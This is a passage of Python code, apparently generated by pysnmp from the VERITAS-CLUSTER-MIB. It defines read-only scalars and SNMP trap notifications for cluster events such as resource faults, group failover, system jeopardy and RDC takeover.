systemLocation = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemLocation.setStatus('mandatory')
entityState = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityState.setStatus('mandatory')
entityContainerType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityContainerType.setStatus('mandatory')
entityContainerName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityContainerName.setStatus('mandatory')
peerSystemName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 11), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: peerSystemName.setStatus('mandatory')
peerSystemLocation = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 12), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: peerSystemLocation.setStatus('mandatory')
message = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 13), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: message.setStatus('mandatory')
eventTime = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 14), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventTime.setStatus('mandatory')
severityId = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("information", 0), ("warning", 1), ("error", 2), ("severeError", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: severityId.setStatus('mandatory')
clusterResourceStateUnknownTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceMonitorTimeoutTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceNotGoingOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceRestartingByAgentTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceWentOnlineByItselfTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupOnlineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupAutoDisabledTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupFaultedAndNowhereToFailoverTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupRestartingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupInitiatingForSwitchingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupConcurencyViolationTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupRestInRspnToPerstResGoOnlineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,9)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterFirstSystemUpTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemRestartingByHashadowTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemInJeopardyTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemJoinedClusterTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemExitedManuallyTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemUpButNotInClusterTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemUsageExceededThresholdTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGUIUserLoginTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 6) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterAgentRestartingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterAgentFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCRlinkInconsistentTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCRlinkNotUpToDateTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCTakeoverFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCMigrateFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCTakeoverSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCMigrateSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCActingSecondaryTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
